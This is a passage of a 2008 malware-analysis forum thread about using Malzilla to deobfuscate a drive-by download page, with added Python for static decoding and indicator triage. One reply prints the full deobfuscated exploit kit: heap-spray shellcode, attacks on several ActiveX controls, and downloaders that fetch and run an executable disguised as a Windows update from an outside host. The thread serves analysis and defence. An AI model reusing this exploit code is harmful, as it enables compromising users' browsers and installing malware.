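The decoder at the tail of that script is small enough to reimplement outside a JavaScript engine: every character of the big string is looked up in the `uaigei` table to get six bits, the bits are packed least-significant first into an accumulator, and each completed byte is XORed with 41. The Python below is an added example, not code from the thread or from Malzilla. It transcribes that loop so the payload is returned as text instead of being handed to `eval()`. Because the blob above is cut short in this copy of the thread, the demo round-trips a harmless constructed snippet through a constructed inverse `encode()` helper; that encoder is a hypothetical addition for testing, not anything the malware shipped.

```python
# Table copied verbatim from the script above. Entry i is the 6-bit value of
# the character with code 33 + i; the characters that actually carry data are
# '!', '0'-'9', '@', 'A'-'Z' and 'a'-'z' (64 symbols, one per value).
UAIGEI = [63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 44, 21, 55, 40, 22, 1,
          53, 39, 38, 0, 0, 0, 0, 0, 0, 20, 42, 0, 37, 3, 54, 15, 4, 36, 11, 12,
          59, 10, 32, 58, 9, 19, 16, 25, 26, 28, 51, 48, 24, 7, 49, 56, 0, 0, 0,
          0, 0, 0, 5, 8, 52, 14, 17, 2, 27, 18, 43, 47, 13, 41, 45, 30, 31, 29,
          50, 57, 33, 35, 6, 23, 62, 61, 60, 34]

# The script's `41^ruleddw&255`: in JScript & binds tighter than ^, so this is
# 41 ^ (accumulator & 0xFF).
KEY = 41

ALPHABET = "!0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def table_value(ch, table=UAIGEI):
    """uaigei[charCode - 33]; JScript yields undefined (-> 0) for indexes
    outside the table, which is why the newlines from the forum paste are harmless."""
    i = ord(ch) - 33
    return table[i] if 0 <= i < len(table) else 0


def decode(encoded, key=KEY, table=UAIGEI):
    """Static re-implementation of the inner loop above; nothing is executed.

    Every character supplies six bits, packed least-significant-bit first.
    Whenever the accumulator holds a whole byte it is XORed with the key and
    emitted, so four input characters yield three output bytes.
    """
    out = []
    acc = 0    # ruleddw
    shift = 0  # xlkxqsz
    for ch in encoded:
        acc |= table_value(ch, table) << shift
        if shift:
            out.append(chr(key ^ (acc & 0xFF)))
            acc >>= 8
            shift -= 2
        else:
            shift = 6
    return "".join(out)


def encode(plaintext, key=KEY, table=UAIGEI):
    """Constructed inverse of decode(), present only to build a test vector.
    Hypothetical helper: the malware's encoder was never published."""
    inverse = {table_value(c, table): c for c in ALPHABET}
    assert len(inverse) == 64, "alphabet must cover every 6-bit value"
    out, bits, nbits = [], 0, 0
    for byte in plaintext.encode("latin-1"):
        bits |= (byte ^ key) << nbits
        nbits += 8
        while nbits >= 6:
            out.append(inverse[bits & 63])
            bits >>= 6
            nbits -= 6
    if nbits:
        out.append(inverse[bits & 63])
    return "".join(out)


if __name__ == "__main__":
    # Round-trip a harmless constructed snippet instead of the truncated blob.
    sample = "var url='http://example.invalid/'; document.write(url);"
    blob = encode(sample)
    assert decode(blob) == sample
    print(blob)
    print(decode(blob))
```

Reading the decoder this way also explains the behaviour bobby describes later in the thread: the script calls `eval()` once per input character for the table lookup and once per output byte for `String.fromCharCode`, so a tool that captures every `eval()` argument to a file sees tens of thousands of tiny, mostly identical fragments before the one large final string that matters.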


September 01, 2008, 11:03:25 pm
Reply #188

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Same here :( (confirmed on XP SP2 and SP3)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 04:04:47 am
Reply #189

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Which option do you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on the partition, as this script requires a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?

September 02, 2008, 04:05:56 am
Reply #190

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Here is the script after deobfuscation:
Code:
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
var target=new Array("BD96C556"+repl[0]+"65A3-11D0-983A-00C04FC29E36","AB9BCEDD"+repl[0]+"EC7E-47E1-9322-D4A210617116","0006F033"+repl[0]+"0000-0000-C000-000000000046","0006F03A"+repl[0]+"0000-0000-C000-000000000046","6e32070a"+repl[0]+"766d-4ee6-879c-dc1fa91d2fc3","6414512B"+repl[0]+"B978-451D-A0D8-FCFDF33E833C","7F5B7F63"+repl[0]+"F06F-4331-8A26-339E03C0AE3D","06723E09"+repl[0]+"F4C2-43c8-8358-09FCD1DB0766","639F725F"+repl[0]+"1B2D-4831-A9FD-874847682010","BA018599"+repl[0]+"1DB3-44f9-83B4-461454C84BF8","D0C07D56"+repl[0]+"7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF"+repl[0]+"CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute(repl[18]+"assid",repl[18]+"sid:"+target[i]);
if(a){try{var b=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");if(b){if(Go(a))return 1;}}catch(e){}}
i++;
}
}
if(mdac()) success=1;
if(!success){
document.write("<script language=VBScript>\r\n"+
'Set elem=document.createElement("ob'+repl[4]+'ct")'+"\r\n"+
'fname="KB908518.exe"'+"\r\n"+
'elem.setAttribute "id","elem"'+"\r\n"+
'elem.setAttribute "'+repl[18]+'assid","'+repl[18]+'sid:BD96C556'+repl[0]+'65A3-11D0-983A-00C04FC29E36"'+"\r\n"+
'Set obj=elem.CreateObject("Sh'+repl[5]+'l.Appli'+repl[6]+'tion","")'+"\r\n"+
"Set nsp=obj.NameSpace(20)\r\n"+
'Set pnm=nsp.ParseName("Symbol.ttf")'+"\r\n"+
'tmp=Split(pnm.Path,"\\",-1,1)'+"\r\n"+
'path=tmp(0) & "\\" &  tmp(1) & "\\"'+"\r\n"+
"fname=path & fname\r\n"+
'set tpqpd=CreateObject("Micr'+repl[9]+'oft.XM'+repl[10]+'TTP")'+"\r\n"+
'iiqu=tpqpd.Open("GET",exeurl,0)'+"\r\n"+
"tpqpd.Send()\r\n"+
"On Error Resume Next\r\n"+
"egsyho=tpqpd.responseBody\r\n"+
'Set acvqqrp=elem.CreateObject("Scr'+repl[1]+'ting.F'+repl[2]+'eSys'+repl[3]+'mOb'+repl[4]+'ct","")'+"\r\n"+
"Set kld=acvqqrp.CreateTextFile(fname, TRUE)\r\n"+
"lotzom=LenB(egsyho)\r\n"+
"For j=1 To lotzom\r\n"+
"plkosl=MidB(egsyho,j,1)\r\n"+
"qamplxd=AscB(plkosl)\r\n"+
"kld.Write(Chr(qamplxd))\r\n"+
"Next\r\n"+
"kld.Close\r\n"+
'Set yipt=elem.CreateObject("WScr'+repl[1]+'t.Sh'+repl[5]+'l","")'+"\r\n"+
"On Error Resume Next\r\n"+
"yipt.R"+repl[19]+" fname,1,FALSE\r\n"+
'<\/script>');
}

if(!success){
exeurl=url+'9';
document.write('<object classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" id="test"></object>');
try{test.DownloadFile(exeurl,"..\\~tmp0001.exe","0","0");document.location="exploits/x9.php?zenturi=1";}catch(e){}
}

var nop='90',noc='0C',scf='F';var shellco='%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320'+
'%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE'+'%u3828%u74F2'+
'%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF'+'%u5EE7%u5E8B'+
'%u0324%u66DD%u0C8B%u8B4B'+'%u1C5E%uDD03%u048B%u038B'+
'%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u2e00%u5C2e'+
'%u2e7e%u7865%u0065%uC033%u0364%u3040%u0C78%u408B'+
'%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40'+
'%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83'+
'%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F'+'%u6FE8'+
'%uFFF'+scf+'%u8BFF%u2454%u8DFC%uBA52%uDB33'+'%u5353%uEB52'+
'%u5324%uD0FF%uBF5D%uFE98%u0E8A'+'%u53E8%uFFF'+scf+'%u83FF'+
'%u04EC%u2C83%u6224%uD0FF%u7EBF'+'%uE2D8%uE873%uFF40'+
'%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7A79%u2E65%u6E63%u672F%u7465%u7865%u2E65%u7865%u3F65%u3D6F%u2632%u3D74%u3231%u3032%u3033%u3139%u3039%u6926%u313D%u3633%u3935%u3433%u3838%u2630%u3D65';


if(!success){

var obj=null;

try{

obj=document.createElement("object");

obj.setAttribute("classid","clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F");

if(obj){

var mystring=unescape(shellco+"%u3731");

var hbs=0x100000,sss=hbs-(mystring.length*2+0x38);

var hb=(0x0c0c0c0c-hbs)/hbs;

var myvar=unescape("%u"+noc+noc+"%u"+noc+noc);

var ss=myvar;

while(ss.length*2<sss)ss+=ss;

ss=ss.substring(0,sss/2);

var m=new Array();

for(i=0;i<hb;i++)m[i]=ss+mystring;

z=Math.ceil(0x0c0c0c0c);

z=document.scripts[0].createControlRange().length;

}

}catch(e){}

}



if(!success){
obj=document.write('<iframe src="exploits/x12b.php?o=2&t=1220309190&i=1365934880" width=0 height=0></iframe>');
}



if(!success){

var repl=new Array("cl","-");

try{

obj=document.createElement("object");

obj.setAttribute(repl[0]+"assid",repl[0]+"sid:2F542A2E"+repl[1]+"EDC9-4BF7-8CB1-87C9919F7F93");

var mystring=unescape(shellco+'%u3331');

var myvar = unescape("%u"+noc+noc+"%u"+noc+noc);

var bblock = myvar;

var sspace = 20 + mystring.length;

while (bblock.length < sspace) bblock += bblock;

var fblock = bblock.substring(0,sspace);

var block = bblock.substring(0,bblock.length - sspace);

while (block.length + sspace < 0x40000) block = block + block + fblock;

var mem = new Array();

for (i=0; i<400; i++) mem[i]=block+mystring;

var buf = '';

while (buf.length < 32) buf = buf + unescape("%"+noc);

var m = '';

m = obj.Console;

obj.Console = buf;

obj.Console = m;

m = obj.Console;

obj.Console = buf;

obj.Console = m;

}catch(e){}

}



if(!success){
var target1=document.createElement("object");
target1.setAttribute("classid","clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277");
var target2=document.createElement("object");
target2.setAttribute("classid","clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
var mystring=unescape(shellco+'%u3031');
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigblock=myvar;
var slspace=20+mystring.length;
while(bigblock.length<slspace)bigblock+=bigblock;
var fillblock=bigblock.substring(0,slspace);
var block=bigblock.substring(0,bigblock.length-slspace);
while(block.length+slspace<0x40000)block=block+block+fillblock;
var memory=new Array();
for(x=0;x<800;x++)memory[x]=block+mystring;
buffer="\x0a";
add = buffer+buffer+buffer+buffer;
while(buffer.length<5000)buffer+=add;
try{target1.server=buffer;target1.initialize();target1.send()}catch(e){}
try{target2.server=buffer;target2.receive();}catch(e){}
}

if(!success){

var repl=new Array("cl","-");

try{

winzip=document.createElement("object");

winzip.setAttribute(repl[0]+"assid",repl[0]+"sid:A09AE68F"+repl[1]+"B14D-43ED-B713-BA413F034904");

var mystring=unescape(shellco+'%u2038');

var hstoaddr=0x0c0c0c0c;

var hbsize=0x400000;

var spslsize=hbsize-(mystring.length*2+0x38);

var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);

var bigb=myvar;

while(bigb.length*2<spslsize)bigb+=bigb;

bigb=bigb.substring(0,spslsize/2);

hblocks=(hstoaddr-0x400000)/hbsize;

var memory=new Array();

for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;

var test='';

for(i=1;i<231;i++)test+='A';

test+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";

try{winzip.CreateNewFolderFromName(test)}catch(e){}

}catch(e){}

}



if(!success){
var repl=new Array("ti","bj");
try{
var test=eval("new Ac"+repl[0]+"veXO"+repl[1]+"ect('QuickTime.QuickTime')");
var mystring=unescape(shellco+'%u2037');
var hstoaddr=0x0c0c0c0c;
var hbsize=0x400000;
var spslsize=hbsize-(mystring.length*2+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var bigb=myvar;
while(bigb.length*2<spslsize)bigb+=bigb;
hblocks=(hstoaddr-0x400000)/hbsize;
bigb=bigb.substring(0,spslsize/2);
var memory=new Array();
for(var i=0;i<hblocks;i++)memory[i]=bigb+mystring;
document.write('<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"><param name="src" value="exploits/x7b.php"><param name="autoplay" value="true"><param name="loop" value="false"><param name="controller" value="true"></object>');}
catch(e){}
}

if(!success){
try{
var obj=document.createElement("object");
obj.setAttribute("classid","clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E");
var hstoaddr=0x05050505;
var mystring=unescape(shellco+'%u2033');
var hbsize=0x400000;
var plsize=mystring.length*2;
var spslsize=hbsize-(plsize+0x38);
var myvar=unescape("%u"+nop+nop+"%u"+nop+nop);
var spsl=myvar;
while(spsl.length*2<spslsize)spsl+=spsl;
var spsl=spsl.substring(0,spslsize/2);
hblocks=(hstoaddr-0x400000)/hbsize;
var memory=new Array();
for(i=0;i<hblocks;i++)memory[i]=spsl+mystring;
var ssrt=' method="';
for(i=0;i<10437;i++)ssrt+='&#x0505;';
document.write('<html xmlns:v="urn:schemas-microsoft-com:vml"><object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object><style>v\\:*{behavior:url(#VMLRender);}</style><v:rect style="width:120pt;height:80pt" fillcolor="red"><v:fill'+ssrt+'"></v:rect></v:fill>');
}catch(e){}
}

if(!success){
var repl=new Array("eb","ie","ol","co","et","li");
try{
var wvfi="W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.W"+repl[0]+"V"+repl[1]+"wF"+repl[2]+"derI"+repl[3]+"n.1";
var wvfio=new ActiveXObject(wvfi);
var mystring='%u'+nop+nop+shellco+'%u2032';
while(mystring.length<3072)mystring+="%u"+noc+noc;
mystring=unescape(mystring);
var myvar=unescape("%u"+noc+noc);
var bigb=myvar;
while(bigb.length<=0x100000)bigb+=bigb;
var memory=new Array();
for(var i=0;i<120;i++)memory[i]=bigb.substring(0,0x100000-mystring.length)+mystring;
for(var i=0;i<1024;i++){
var wvfio=new ActiveXObject(wvfi);
eval("try{wvfio.s"+repl[4]+"S"+repl[5]+"ce(0x7ffffffe,0,0,202116108);}catch(e){}");
var wvfio=new ActiveXObject(wvfi);
}
}catch(e){}
}
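Once a script has been deobfuscated to this point, the useful indicators are all in the clear: download URLs, the CLSIDs of the ActiveX controls it instantiates, and the `%u`-encoded buffers that `unescape()` turns into shellcode (the one above embeds its own download URL as `%u7468%u7074...`, i.e. "http"). The Python below is an added example, not part of the thread or of Malzilla, and runs a static triage pass over a constructed sample that mirrors the structure of the script above; its CLSID and hostnames are placeholders, not the values from the post.

```python
import re

# Constructed sample that mirrors the shape of the deobfuscated script above:
# a download URL, an <object> instantiated by CLSID, and a %u-encoded buffer
# that embeds a DLL name and a second URL. The CLSID and hostnames are
# placeholders, not the values from the post.
SAMPLE_JS = r"""
var url='http://dropper.invalid/get.exe?o=2';
document.write('<object classid="clsid:12345678-1234-1234-1234-123456789ABC" id="t"></object>');
var shellco='%u9090%u9090'+'%u7275%u6D6C%u6E6F%u642E%u6C6C%u0000'+
'%u7468%u7074%u2F3A%u702F%u7961%u6F6C%u6461%u692E%u766E%u6C61%u6469%u782F%u652E%u6578%u0000';
"""

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
CLSID_RE = re.compile(r"clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.IGNORECASE)
PERCENT_U_RE = re.compile(r"%u([0-9a-f]{4})", re.IGNORECASE)


def decode_percent_u(text):
    """Rebuild the bytes unescape() would place in memory for every %uXXXX.

    JScript stores each escape as one UTF-16 code unit, little-endian, so
    %u7468 becomes 0x68 0x74 ('ht'). Only literal escapes are recovered here;
    ones assembled at run time ('%u'+nop+nop) need the script to be executed,
    which is the job Malzilla's eval() handling does.
    """
    return b"".join(int(h, 16).to_bytes(2, "little") for h in PERCENT_U_RE.findall(text))


def printable_strings(data, min_len=4):
    """strings(1)-style pass: runs of printable ASCII at least min_len long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(js):
    """Collect the indicators an analyst pulls from a deobfuscated exploit page."""
    shell = decode_percent_u(js)
    strings = printable_strings(shell)
    urls = set(URL_RE.findall(js))
    for s in strings:                      # URLs hidden inside the shellcode
        urls.update(URL_RE.findall(s))
    return {
        "clsids": sorted({c.upper() for c in CLSID_RE.findall(js)}),
        "urls": sorted(urls),
        "shellcode_bytes": len(shell),
        "shellcode_strings": strings,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_JS).items():
        print(f"{key}: {value}")
```

The CLSID list is what to check against the vendor's kill-bit advisories and the URL list is what goes to the blocklist; the decoded strings show where the shellcode will fetch its second stage from without anyone having to run it.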

September 02, 2008, 05:01:30 am
Reply #191

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've got it set to Override :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

September 02, 2008, 03:21:00 pm
Reply #192

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Please use "Leave as is" as long as it gives results. Use the other two options just in case "Leave as is" does not work.

September 02, 2008, 06:07:01 pm
Reply #193

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Bobby, what are your PC specs and how long did it need to run for? This takes a while... and if you go to other windows and then back to Malzilla's window it gives the access violation.

September 02, 2008, 06:51:49 pm
Reply #194

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I use 2GHz AMD Athlon XP with 1GB RAM. Pretty old configuration for today's standards.
In your example, it creates some 22.000 temp files in the eval_temp folder (every time eval() is called, a file is created, and it contains the arguments of the eval() function). After that, Malzilla will eliminate duplicates between the temp files, so fewer than 10 files will remain after that (usually 3-5 files).
Most of the temp files are just a couple of bytes long (<100 bytes), but every file will occupy one whole cluster (usually 4kb), so you need 80mb free space on partition for the temp files.
To deobfuscate this script, my PC needs some 2-3 minutes (no anti-virus app is running, or some other heavy-duty service). Partition is NTFS, not compressed, file indexing is turned off.

I will try to reproduce the bug you got.

btw. are you running more than one instance of Malzilla at once? Both working on deobfuscation at the same time?